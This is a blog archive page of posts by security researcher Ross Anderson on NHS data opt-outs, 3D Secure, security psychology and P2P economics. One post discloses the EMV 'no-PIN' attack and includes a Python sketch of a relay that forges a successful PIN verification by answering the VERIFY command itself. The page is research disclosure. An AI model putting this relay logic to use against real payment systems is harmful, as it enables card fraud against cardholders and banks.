All posts by Ross Anderson

Opting out of health data collection

The Government is rolling out a system – the Summary Care Record or SCR – which will make summaries of medical records available to hundreds of thousands of NHS staff in England. Ministers say it will facilitate emergency and unscheduled care, but the evidence in favour of such systems is slight. It won’t be available abroad (or even in Scotland), so if you are allergic to penicillin you’d better keep on wearing your dogtag. But the privacy risk is clear; a similar system in Scotland was quickly abused. Colleagues and I criticised the SCR in Database State, a report we wrote on how government systems infringe human rights.

Doctors have acted at last. The SCR is being rolled out across London, and the Local Medical Committees there have produced a poster and an opt-out leaflet for doctors to use in their waiting rooms. The SCR is also political: while Labour backs it, the Conservatives and the Lib Dems oppose it. Its roll-out means that millions of leaflets extolling its virtues will be distributed to voters – pardon me, patients – in London. A cynic might ask whether this is a suitable use of public funds during an election campaign.

Chip and PIN is broken

There should be a 9-minute film on Newsnight tonight (10:30pm, BBC Two) showing some research by Steven Murdoch, Saar Drimer, Mike Bond and me. We demonstrate a middleperson attack on EMV which lets criminals use stolen chip and PIN cards without knowing the PIN.

Our technical paper Chip and PIN is Broken explains how. It has been causing quite a stir as it has been circulating privately within the banking industry for over two months, and it has been accepted for the IEEE Symposium on Security and Privacy, the top conference in computer security. (See also our FAQ and the press release.)

The flaw is that when you put a card into a terminal, a negotiation takes place about how the cardholder should be authenticated: using a PIN, using a signature or not at all. This particular subprotocol is not authenticated, so you can trick the card into thinking it’s doing a chip-and-signature transaction while the terminal thinks it’s chip-and-PIN. The upshot is that you can buy stuff using a stolen card and a PIN of 0000 (or anything you want). We did so, on camera, using various journalists’ cards. The transactions went through fine and the receipts say “Verified by PIN”.
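To make the idea concrete, here is a minimal sketch in Python of the interception logic – purely illustrative, not the hardware man-in-the-middle described in the paper, and with invented class and constant names. The relay passes commands between terminal and card unchanged, except that it answers the terminal’s VERIFY command itself with the 0x9000 success code, so the card never performs (or fails) a PIN check.

# Illustrative sketch (not the authors' implementation) of the "no-PIN"
# man-in-the-middle idea. A relay sits between the terminal and the card,
# passing APDUs through unchanged except for the VERIFY command (INS 0x20),
# which it answers itself with 0x9000 ("PIN verified") and never forwards
# to the card.

SW_SUCCESS = bytes([0x90, 0x00])
INS_VERIFY = 0x20

class StubCard:
    """Stand-in for a real card: it never sees a VERIFY command."""
    def transmit(self, apdu: bytes) -> bytes:
        # A real card would process SELECT, GPO, GENERATE AC, and so on.
        return SW_SUCCESS

class NoPinRelay:
    """Relay that spoofs a successful PIN verification to the terminal."""
    def __init__(self, card):
        self.card = card

    def transmit(self, apdu: bytes) -> bytes:
        ins = apdu[1]
        if ins == INS_VERIFY:
            # Lie to the terminal: claim the PIN was correct, and drop the
            # command, so the card assumes a signature (or no-CVM)
            # transaction is taking place.
            return SW_SUCCESS
        return self.card.transmit(apdu)

# The terminal sends VERIFY with whatever PIN was typed (here 0000, as a
# plaintext format-2 PIN block) and accepts the forged response.
relay = NoPinRelay(StubCard())
verify_apdu = bytes([0x00, INS_VERIFY, 0x00, 0x80, 0x08,
                     0x24, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF])
print(relay.transmit(verify_apdu) == SW_SUCCESS)  # True: "Verified by PIN"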

How online card security fails

Online transactions with credit cards or debit cards are increasingly verified using the 3D Secure system, which is branded as “Verified by VISA” and “MasterCard SecureCode”. This is now the most widely-used single sign-on scheme ever, with over 200 million cardholders registered. It’s getting hard to shop online without being forced to use it.

In a paper I’m presenting today at Financial Cryptography, Steven Murdoch and I analyse 3D Secure. From the engineering point of view, it does just about everything wrong, and it’s becoming a fat target for phishing. So why did it succeed in the marketplace?

Quite simply, it has strong incentives for adoption. Merchants who use it push liability for fraud back to banks, who in turn push it on to cardholders. Properly designed single sign-on systems, like OpenID and InfoCard, can’t offer anything like this. So this is yet another case where security economics trumps security engineering, but in a predatory way that leaves cardholders less secure. We conclude with a suggestion on what bank regulators might do to fix the problem.

Update (2010-01-27): There has been some follow-up media coverage.

Update (2010-01-28): The New Scientist also has the story, as has Ars Technica.

Security psychology

I have put together a web page on psychology and security. There is a fascinating interplay between these two subjects, and their intersection is now emerging as a new research discipline, encompassing deception, risk perception, security usability and a number of other important topics. I hope that the new web page will be as useful in spreading the word as my security economics page has been in that field.

Economics of peer-to-peer systems

A new paper, Olson’s Paradox Revisited: An Empirical Analysis of File-Sharing Behaviour in P2P Communities, finds a positive correlation between the size of a BitTorrent file-sharing community and the amount of content shared, despite a reduced individual propensity to share in larger groups, and deduces from this that file-sharing communities provide a pure (non-rival) public good. Forcing users to upload results in a smaller catalogue, but private networks provide both more and better content, as do networks aimed at specialised communities.

George Danezis and I produced a theoretical model of this five years ago in The Economics of Censorship Resistance. It’s nice to see that the data, now collected, bear us out.

Security and Human Behaviour 2009

I’m at SHB 2009, which brings security engineers together with psychologists, behavioural economists and others interested in deception, fraud, fearmongering, risk perception and how we make security systems more usable. Here is the agenda.

This workshop was first held last year, and most of us who attended reckoned it was the most exciting event we’d been to in quite a while. (I blogged SHB 2008 here.) In follow-ups that will appear as comments to this post, I’ll be liveblogging SHB 2009.

Security economics video

Here is a video of a talk I gave at DMU on security economics (and the slides). I’ve given variants of this survey talk at various conferences over the past two or three years; at last, one of them recorded the talk and put the video online. There’s also a survey paper that covers much of the same material. If you find this interesting, you might enjoy coming along to WEIS (the Workshop on the Economics of Information Security) on June 24-25.